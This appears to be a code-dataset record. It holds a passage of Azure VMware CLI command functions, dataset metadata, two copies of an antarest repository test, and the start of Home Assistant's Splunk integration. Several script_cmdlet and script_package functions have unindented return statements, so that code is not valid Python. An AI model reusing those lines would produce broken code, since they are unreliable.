    return client.global_reach_connections.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, global_reach_connection_name=name)
def cloud_link_create(client: AVSClient, resource_group_name, name, private_cloud, linked_cloud):
    """Create a cloud link to another private cloud."""
    return client.cloud_links.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name, linked_cloud=linked_cloud)
def cloud_link_list(client: AVSClient, resource_group_name, private_cloud):
    """List cloud links for a private cloud."""
    return client.cloud_links.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def cloud_link_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Return a single cloud link by name."""
    return client.cloud_links.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name)
def cloud_link_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete a cloud link (long-running operation)."""
    return client.cloud_links.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cloud_link_name=name)
def script_cmdlet_list(client: AVSClient, resource_group_name, private_cloud, script_package):
return client.script_cmdlets.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=script_package)
def script_cmdlet_show(client: AVSClient, resource_group_name, private_cloud, script_package, name):
return client.script_cmdlets.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=script_package, script_cmdlet_name=name)
def script_package_list(client: AVSClient, resource_group_name, private_cloud):
return client.script_packages.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def script_package_show(client: AVSClient, resource_group_name, private_cloud, name):
return client.script_packages.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_package_name=name)
def script_execution_create(client: AVSClient, resource_group_name, private_cloud, name, timeout, script_cmdlet_id=None, parameters=None, hidden_parameters=None, failure_reason=None, retention=None, out=None, named_outputs: List[Tuple[str, str]] = None):
    """Create or update a script execution in a private cloud (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import ScriptExecution
    # The CLI hands named outputs over as (key, value) pairs; the SDK expects a mapping.
    outputs_map = dict(named_outputs) if named_outputs is not None else None
    execution = ScriptExecution(
        timeout=timeout,
        script_cmdlet_id=script_cmdlet_id,
        parameters=parameters,
        hidden_parameters=hidden_parameters,
        failure_reason=failure_reason,
        retention=retention,
        output=out,
        named_outputs=outputs_map,
    )
    return client.script_executions.begin_create_or_update(
        resource_group_name=resource_group_name,
        private_cloud_name=private_cloud,
        script_execution_name=name,
        script_execution=execution,
    )
def script_execution_list(client: AVSClient, resource_group_name, private_cloud):
    """List script executions in a private cloud."""
    return client.script_executions.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def script_execution_show(client: AVSClient, resource_group_name, private_cloud, name):
    """Get a script execution by name."""
    return client.script_executions.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def script_execution_delete(client: AVSClient, resource_group_name, private_cloud, name):
    """Delete a script execution (long-running operation)."""
    return client.script_executions.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def script_execution_logs(client: AVSClient, resource_group_name, private_cloud, name):
    """Fetch the execution logs of a script execution."""
    return client.script_executions.get_execution_logs(resource_group_name=resource_group_name, private_cloud_name=private_cloud, script_execution_name=name)
def workload_network_dhcp_server_create(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_address=None, lease_time=None):
    """Create a DHCP server entity on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpServer
    properties = WorkloadNetworkDhcpServer(display_name=display_name, revision=revision, server_address=server_address, lease_time=lease_time)
    return client.workload_networks.begin_create_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_relay_create(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_addresses=None):
    """Create a DHCP relay entity on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpRelay
    properties = WorkloadNetworkDhcpRelay(display_name=display_name, revision=revision, server_addresses=server_addresses)
    return client.workload_networks.begin_create_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_server_update(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_address=None, lease_time=None):
    """Update a DHCP server entity on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpServer
    properties = WorkloadNetworkDhcpServer(display_name=display_name, revision=revision, server_address=server_address, lease_time=lease_time)
    return client.workload_networks.begin_update_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_relay_update(client: AVSClient, resource_group_name, private_cloud, dhcp: str, display_name=None, revision=None, server_addresses=None):
    """Update a DHCP relay entity on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDhcpRelay
    properties = WorkloadNetworkDhcpRelay(display_name=display_name, revision=revision, server_addresses=server_addresses)
    return client.workload_networks.begin_update_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp, properties=properties)
def workload_network_dhcp_delete(client: AVSClient, resource_group_name, private_cloud, dhcp: str):
    """Delete a DHCP entity (server or relay) from the workload network."""
    return client.workload_networks.begin_delete_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp)
def workload_network_dhcp_list(client: AVSClient, resource_group_name, private_cloud):
    """List DHCP entities on the workload network."""
    return client.workload_networks.list_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dhcp_show(client: AVSClient, resource_group_name, private_cloud, dhcp: str):
    """Get a DHCP entity by id."""
    return client.workload_networks.get_dhcp(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dhcp_id=dhcp)
def workload_network_dns_services_list(client: AVSClient, resource_group_name, private_cloud):
    """List DNS services on the workload network."""
    return client.workload_networks.list_dns_services(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dns_services_get(client: AVSClient, resource_group_name, private_cloud, dns_service):
    """Get a DNS service by id."""
    return client.workload_networks.get_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service)
def workload_network_dns_services_create(client: AVSClient, resource_group_name, private_cloud, dns_service, display_name=None, dns_service_ip=None, default_dns_zone=None, fqdn_zones=None, log_level=None, revision=None):
    """Create a DNS service on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsService
    prop = WorkloadNetworkDnsService(display_name=display_name, dns_service_ip=dns_service_ip, default_dns_zone=default_dns_zone, log_level=log_level, revision=revision, fqdn_zones=fqdn_zones)
    return client.workload_networks.begin_create_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service, workload_network_dns_service=prop)
def workload_network_dns_services_update(client: AVSClient, resource_group_name, private_cloud, dns_service, display_name=None, dns_service_ip=None, default_dns_zone=None, fqdn_zones=None, log_level=None, revision=None):
    """Update a DNS service on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsService
    prop = WorkloadNetworkDnsService(display_name=display_name, dns_service_ip=dns_service_ip, default_dns_zone=default_dns_zone, fqdn_zones=fqdn_zones, log_level=log_level, revision=revision)
    return client.workload_networks.begin_update_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service, workload_network_dns_service=prop)
def workload_network_dns_services_delete(client: AVSClient, resource_group_name, private_cloud, dns_service):
    """Delete a DNS service from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_dns_service(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_service_id=dns_service)
def workload_network_dns_zone_list(client: AVSClient, resource_group_name, private_cloud):
    """List DNS zones on the workload network."""
    return client.workload_networks.list_dns_zones(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_dns_zone_get(client: AVSClient, resource_group_name, private_cloud, dns_zone):
    """Get a DNS zone by id."""
    return client.workload_networks.get_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone)
def workload_network_dns_zone_create(client: AVSClient, resource_group_name, private_cloud, dns_zone, display_name=None, domain=None, dns_server_ips=None, source_ip=None, dns_services=None, revision=None):
    """Create a DNS zone on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsZone
    prop = WorkloadNetworkDnsZone(display_name=display_name, domain=domain, dns_server_ips=dns_server_ips, source_ip=source_ip, dns_services=dns_services, revision=revision)
    return client.workload_networks.begin_create_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone, workload_network_dns_zone=prop)
def workload_network_dns_zone_update(client: AVSClient, resource_group_name, private_cloud, dns_zone, display_name=None, domain=None, dns_server_ips=None, source_ip=None, dns_services=None, revision=None):
    """Update a DNS zone on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkDnsZone
    prop = WorkloadNetworkDnsZone(display_name=display_name, domain=domain, dns_server_ips=dns_server_ips, source_ip=source_ip, dns_services=dns_services, revision=revision)
    return client.workload_networks.begin_update_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone, workload_network_dns_zone=prop)
def workload_network_dns_zone_delete(client: AVSClient, resource_group_name, private_cloud, dns_zone):
    """Delete a DNS zone from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_dns_zone(resource_group_name=resource_group_name, private_cloud_name=private_cloud, dns_zone_id=dns_zone)
def workload_network_port_mirroring_list(client: AVSClient, resource_group_name, private_cloud):
    """List port-mirroring profiles on the workload network."""
    return client.workload_networks.list_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_port_mirroring_get(client: AVSClient, resource_group_name, private_cloud, port_mirroring):
    """Get a port-mirroring profile by id."""
    return client.workload_networks.get_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring)
def workload_network_port_mirroring_create(client: AVSClient, resource_group_name, private_cloud, port_mirroring, display_name=None, direction=None, source=None, destination=None, revision=None):
    """Create a port-mirroring profile on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkPortMirroring
    prop = WorkloadNetworkPortMirroring(display_name=display_name, direction=direction, source=source, destination=destination, revision=revision)
    return client.workload_networks.begin_create_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring, workload_network_port_mirroring=prop)
def workload_network_port_mirroring_update(client: AVSClient, resource_group_name, private_cloud, port_mirroring, display_name=None, direction=None, source=None, destination=None, revision=None):
    """Update a port-mirroring profile on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkPortMirroring
    prop = WorkloadNetworkPortMirroring(display_name=display_name, direction=direction, source=source, destination=destination, revision=revision)
    return client.workload_networks.begin_update_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring, workload_network_port_mirroring=prop)
def workload_network_port_mirroring_delete(client: AVSClient, resource_group_name, private_cloud, port_mirroring):
    """Delete a port-mirroring profile from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_port_mirroring(resource_group_name=resource_group_name, private_cloud_name=private_cloud, port_mirroring_id=port_mirroring)
def workload_network_segment_list(client: AVSClient, resource_group_name, private_cloud):
    """List segments on the workload network."""
    return client.workload_networks.list_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_segment_get(client: AVSClient, resource_group_name, private_cloud, segment):
    """Get a segment by id."""
    return client.workload_networks.get_segment(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment)
def workload_network_segment_create(client: AVSClient, resource_group_name, private_cloud, segment, display_name=None, connected_gateway=None, revision=None, dhcp_ranges=None, gateway_address=None, port_name=None):
    """Create a segment on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentPortVif
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentSubnet
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegment
    # Assemble the nested SDK model: port VIF + subnet are sub-objects of the segment.
    portVif = WorkloadNetworkSegmentPortVif(port_name=port_name)
    subnet = WorkloadNetworkSegmentSubnet(dhcp_ranges=dhcp_ranges, gateway_address=gateway_address)
    segmentObj = WorkloadNetworkSegment(display_name=display_name, connected_gateway=connected_gateway, subnet=subnet, port_vif=portVif, revision=revision)
    return client.workload_networks.begin_create_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment, workload_network_segment=segmentObj)
def workload_network_segment_update(client: AVSClient, resource_group_name, private_cloud, segment, display_name=None, connected_gateway=None, revision=None, dhcp_ranges=None, gateway_address=None, port_name=None):
    """Update a segment on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentPortVif
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegmentSubnet
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkSegment
    # Same nested-model assembly as workload_network_segment_create.
    portVif = WorkloadNetworkSegmentPortVif(port_name=port_name)
    subnet = WorkloadNetworkSegmentSubnet(dhcp_ranges=dhcp_ranges, gateway_address=gateway_address)
    segmentObj = WorkloadNetworkSegment(display_name=display_name, connected_gateway=connected_gateway, subnet=subnet, port_vif=portVif, revision=revision)
    return client.workload_networks.begin_update_segments(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment, workload_network_segment=segmentObj)
def workload_network_segment_delete(client: AVSClient, resource_group_name, private_cloud, segment):
    """Delete a segment from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_segment(resource_group_name=resource_group_name, private_cloud_name=private_cloud, segment_id=segment)
def workload_network_public_ip_list(client: AVSClient, resource_group_name, private_cloud):
    """List public IP blocks on the workload network."""
    return client.workload_networks.list_public_i_ps(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_public_ip_get(client: AVSClient, resource_group_name, private_cloud, public_ip):
    """Get a public IP block by id."""
    return client.workload_networks.get_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip)
def workload_network_public_ip_create(client: AVSClient, resource_group_name, private_cloud, public_ip, display_name=None, number_of_public_ips=None):
    """Create a public IP block on the workload network (long-running operation)."""
    return client.workload_networks.begin_create_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip, display_name=display_name, number_of_public_i_ps=number_of_public_ips)
def workload_network_public_ip_delete(client: AVSClient, resource_group_name, private_cloud, public_ip):
    """Delete a public IP block from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_public_ip(resource_group_name=resource_group_name, private_cloud_name=private_cloud, public_ip_id=public_ip)
def workload_network_vm_group_list(client: AVSClient, resource_group_name, private_cloud):
    """List VM groups on the workload network."""
    return client.workload_networks.list_vm_groups(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_vm_group_get(client: AVSClient, resource_group_name, private_cloud, vm_group):
    """Get a VM group by id."""
    return client.workload_networks.get_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group)
def workload_network_vm_group_create(client: AVSClient, resource_group_name, private_cloud, vm_group, display_name=None, members=None, revision=None):
    """Create a VM group on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkVMGroup
    vmGroup = WorkloadNetworkVMGroup(display_name=display_name, members=members, revision=revision)
    return client.workload_networks.begin_create_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group, workload_network_vm_group=vmGroup)
def workload_network_vm_group_update(client: AVSClient, resource_group_name, private_cloud, vm_group, display_name=None, members=None, revision=None):
    """Update a VM group on the workload network (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import WorkloadNetworkVMGroup
    vmGroup = WorkloadNetworkVMGroup(display_name=display_name, members=members, revision=revision)
    return client.workload_networks.begin_update_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group, workload_network_vm_group=vmGroup)
def workload_network_vm_group_delete(client: AVSClient, resource_group_name, private_cloud, vm_group):
    """Delete a VM group from the workload network (long-running operation)."""
    return client.workload_networks.begin_delete_vm_group(resource_group_name=resource_group_name, private_cloud_name=private_cloud, vm_group_id=vm_group)
def workload_network_vm_list(client: AVSClient, resource_group_name, private_cloud):
    """List virtual machines visible to the workload network."""
    return client.workload_networks.list_virtual_machines(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_vm_get(client: AVSClient, resource_group_name, private_cloud, virtual_machine):
    """Get a workload-network virtual machine by id."""
    return client.workload_networks.get_virtual_machine(resource_group_name=resource_group_name, private_cloud_name=private_cloud, virtual_machine_id=virtual_machine)
def workload_network_gateway_list(client: AVSClient, resource_group_name, private_cloud):
    """List gateways on the workload network."""
    return client.workload_networks.list_gateways(resource_group_name=resource_group_name, private_cloud_name=private_cloud)
def workload_network_gateway_get(client: AVSClient, resource_group_name, private_cloud, gateway):
    """Get a workload-network gateway by id."""
    return client.workload_networks.get_gateway(resource_group_name=resource_group_name, private_cloud_name=private_cloud, gateway_id=gateway)
def placement_policy_list(client: AVSClient, resource_group_name, private_cloud, cluster_name):
    """List placement policies in a cluster."""
    return client.placement_policies.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name)
def placement_policy_get(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name):
    """Get a placement policy by name."""
    return client.placement_policies.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_vm_create(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, display_name=None, vm_members=None, affinity_type=None):
    """Create a VM-VM placement policy in a cluster (long-running operation).

    NOTE(review): if vm_members or affinity_type is None the call falls through
    to begin_create_or_update with no properties payload — presumably the SDK
    rejects that request; confirm the intended behavior of this branch.
    """
    from azext_vmware.vendored_sdks.avs_client.models import VmPlacementPolicyProperties
    if vm_members is not None and affinity_type is not None:
        vmProperties = VmPlacementPolicyProperties(type="VmVm", state=state, display_name=display_name, vm_members=vm_members, affinity_type=affinity_type)
        return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, properties=vmProperties)
    return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_vm_host_create(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, display_name=None, vm_members=None, host_members=None, affinity_type=None):
    """Create a VM-Host placement policy in a cluster (long-running operation).

    NOTE(review): same fall-through as placement_policy_vm_create when any of
    vm_members/host_members/affinity_type is None — confirm intended behavior.
    """
    from azext_vmware.vendored_sdks.avs_client.models import VmHostPlacementPolicyProperties
    if vm_members is not None and host_members is not None and affinity_type is not None:
        vmHostProperties = VmHostPlacementPolicyProperties(type="VmHost", state=state, display_name=display_name, vm_members=vm_members, host_members=host_members, affinity_type=affinity_type)
        return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, properties=vmHostProperties)
    return client.placement_policies.begin_create_or_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def placement_policy_update(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, state=None, vm_members=None, host_members=None):
    """Update the mutable fields of an existing placement policy (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import PlacementPolicyUpdate
    props = PlacementPolicyUpdate(state=state, vm_members=vm_members, host_members=host_members)
    return client.placement_policies.begin_update(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name, placement_policy_update=props)
def placement_policy_delete(client: AVSClient, resource_group_name, private_cloud, cluster_name, placement_policy_name, yes=False):
    """Delete a placement policy, prompting for confirmation unless *yes* is set.

    Returns None if the user declines the prompt, otherwise the delete poller.
    """
    from knack.prompting import prompt_y_n
    if not yes:
        confirmed = prompt_y_n('This will delete the placement policy. Are you sure?', default="n")
        if not confirmed:
            return None
    return client.placement_policies.begin_delete(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, placement_policy_name=placement_policy_name)
def virtual_machine_get(client: AVSClient, resource_group_name, private_cloud, cluster_name, virtual_machine):
    """Get a cluster virtual machine by id."""
    return client.virtual_machines.get(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, virtual_machine_id=virtual_machine)
def virtual_machine_list(client: AVSClient, resource_group_name, private_cloud, cluster_name):
    """List virtual machines in a cluster."""
    return client.virtual_machines.list(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name)
def virtual_machine_restrict(client: AVSClient, resource_group_name, private_cloud, cluster_name, virtual_machine, restrict_movement):
    """Enable or disable movement restriction for a VM (long-running operation)."""
    from azext_vmware.vendored_sdks.avs_client.models import VirtualMachineRestrictMovementState
    return client.virtual_machines.begin_restrict_movement(resource_group_name=resource_group_name, private_cloud_name=private_cloud, cluster_name=cluster_name, virtual_machine_id=virtual_machine, restrict_movement=VirtualMachineRestrictMovementState(restrict_movement))
| 39,345
| 0
| 2,691
|
e8543128623a87ce635f365d99f5095e9399562a
| 2,823
|
py
|
Python
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 2
|
2021-11-15T09:26:33.000Z
|
2022-02-24T09:53:54.000Z
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 542
|
2021-01-11T13:23:47.000Z
|
2022-03-31T15:38:10.000Z
|
tests/storage/repository/test_study.py
|
AntaresSimulatorTeam/antaREST
|
d686d2a86a52737c211ae67f3cee591f559909f2
|
[
"Apache-2.0"
] | 1
|
2020-10-01T12:18:15.000Z
|
2020-10-01T12:18:15.000Z
|
from datetime import datetime
from unittest.mock import Mock
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker # type: ignore
from antarest.core.persistence import Base
from antarest.core.utils.fastapi_sqlalchemy import DBSessionMiddleware, db
from antarest.login.model import User, Group
from antarest.study.model import (
Study,
RawStudy,
DEFAULT_WORKSPACE_NAME,
StudyContentStatus,
PublicMode,
)
from antarest.study.repository import StudyMetadataRepository
| 27.144231
| 74
| 0.589444
|
from datetime import datetime
from unittest.mock import Mock
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker # type: ignore
from antarest.core.persistence import Base
from antarest.core.utils.fastapi_sqlalchemy import DBSessionMiddleware, db
from antarest.login.model import User, Group
from antarest.study.model import (
Study,
RawStudy,
DEFAULT_WORKSPACE_NAME,
StudyContentStatus,
PublicMode,
)
from antarest.study.repository import StudyMetadataRepository
def test_cyclelife():
    """Round-trip Study entities through the repository: save, get, delete.

    Fix: removed the unused `sess = scoped_session(...)` local — the session
    factory was created but never used (DBSessionMiddleware manages sessions).
    """
    engine = create_engine("sqlite:///:memory:", echo=True)
    user = User(id=0, name="admin")
    group = Group(id="my-group", name="group")
    Base.metadata.create_all(engine)
    DBSessionMiddleware(
        Mock(),
        custom_engine=engine,
        session_args={"autocommit": False, "autoflush": False},
    )
    with db():
        repo = StudyMetadataRepository()
        a = Study(
            name="a",
            version="42",
            author="John Smith",
            created_at=datetime.now(),
            updated_at=datetime.now(),
            public_mode=PublicMode.FULL,
            owner=user,
            groups=[group],
        )
        b = Study(
            name="b",
            version="43",
            author="Morpheus",
            created_at=datetime.now(),
            updated_at=datetime.now(),
            public_mode=PublicMode.FULL,
            owner=user,
            groups=[group],
        )
        a = repo.save(a)
        b = repo.save(b)
        assert b.id
        c = repo.get(a.id)
        assert a == c
        repo.delete(a.id)
        assert repo.get(a.id) is None
def test_study_inheritance():
    """A RawStudy saved via the repository comes back as RawStudy, not base Study.

    Fix: removed the unused `sess = scoped_session(...)` local — the session
    factory was created but never used (DBSessionMiddleware manages sessions).
    """
    engine = create_engine("sqlite:///:memory:", echo=True)
    user = User(id=0, name="admin")
    group = Group(id="my-group", name="group")
    Base.metadata.create_all(engine)
    DBSessionMiddleware(
        Mock(),
        custom_engine=engine,
        session_args={"autocommit": False, "autoflush": False},
    )
    with db():
        repo = StudyMetadataRepository()
        a = RawStudy(
            name="a",
            version="42",
            author="John Smith",
            created_at=datetime.now(),
            updated_at=datetime.now(),
            public_mode=PublicMode.FULL,
            owner=user,
            groups=[group],
            workspace=DEFAULT_WORKSPACE_NAME,
            path="study",
            content_status=StudyContentStatus.WARNING,
        )
        repo.save(a)
        b = repo.get(a.id)
        assert isinstance(b, RawStudy)
        assert b.path == "study"
| 2,248
| 0
| 46
|
6b40f9b7d58392a2be162f00d5852bd1e08b2a0e
| 3,784
|
py
|
Python
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
homeassistant/components/splunk/__init__.py
|
learn-home-automation/core
|
c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""Support to send data to a Splunk instance."""
import asyncio
from http import HTTPStatus
import json
import logging
import time
from aiohttp import ClientConnectionError, ClientResponseError
from hass_splunk import SplunkPayloadError, hass_splunk
import voluptuous as vol
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PORT,
CONF_SSL,
CONF_TOKEN,
CONF_VERIFY_SSL,
EVENT_STATE_CHANGED,
)
from homeassistant.helpers import state as state_helper
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entityfilter import FILTER_SCHEMA
from homeassistant.helpers.json import JSONEncoder
_LOGGER = logging.getLogger(__name__)
DOMAIN = "splunk"
CONF_FILTER = "filter"
# Defaults for the Splunk HTTP Event Collector endpoint.
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 8088
DEFAULT_SSL = False
DEFAULT_NAME = "HASS"
# YAML configuration: only the HEC token is required; everything else
# falls back to the defaults above.  The filter limits which entities
# are forwarded.
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: vol.Schema(
            {
                vol.Required(CONF_TOKEN): cv.string,
                vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
                vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
                vol.Optional(CONF_SSL, default=False): cv.boolean,
                vol.Optional(CONF_VERIFY_SSL, default=True): cv.boolean,
                vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
                vol.Optional(CONF_FILTER, default={}): FILTER_SCHEMA,
            }
        )
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Set up the Splunk component.

    Validates the HEC token, queues a startup event, and registers a
    state-change listener that forwards filtered entity states to Splunk.
    Returns False when the token check fails, True otherwise.
    """
    conf = config[DOMAIN]
    host = conf.get(CONF_HOST)
    port = conf.get(CONF_PORT)
    token = conf.get(CONF_TOKEN)
    use_ssl = conf[CONF_SSL]
    verify_ssl = conf.get(CONF_VERIFY_SSL)
    name = conf.get(CONF_NAME)
    entity_filter = conf[CONF_FILTER]
    event_collector = hass_splunk(
        session=async_get_clientsession(hass),
        host=host,
        port=port,
        token=token,
        use_ssl=use_ssl,
        verify_ssl=verify_ssl,
    )
    # Validate only the token up front (no connectivity/busy probing).
    if not await event_collector.check(connectivity=False, token=True, busy=False):
        return False
    payload = {
        "time": time.time(),
        "host": name,
        "event": {
            "domain": DOMAIN,
            "meta": "Splunk integration has started",
        },
    }
    # Queue the startup marker without flushing (send=False); it goes out
    # together with the first forwarded state event.
    await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=False)
    async def splunk_event_listener(event):
        """Listen for new messages on the bus and sends them to Splunk."""
        state = event.data.get("new_state")
        # Skip removals and entities excluded by the configured filter.
        if state is None or not entity_filter(state.entity_id):
            return
        try:
            # Prefer a numeric representation; fall back to the raw state string.
            _state = state_helper.state_as_number(state)
        except ValueError:
            _state = state.state
        payload = {
            "time": event.time_fired.timestamp(),
            "host": name,
            "event": {
                "domain": state.domain,
                "entity_id": state.object_id,
                "attributes": dict(state.attributes),
                "value": _state,
            },
        }
        try:
            await event_collector.queue(json.dumps(payload, cls=JSONEncoder), send=True)
        except SplunkPayloadError as err:
            # Auth failures are errors; other payload rejections are only warnings.
            if err.status == HTTPStatus.UNAUTHORIZED:
                _LOGGER.error(err)
            else:
                _LOGGER.warning(err)
        except ClientConnectionError as err:
            _LOGGER.warning(err)
        except asyncio.TimeoutError:
            _LOGGER.warning("Connection to %s:%s timed out", host, port)
        except ClientResponseError as err:
            _LOGGER.error(err.message)
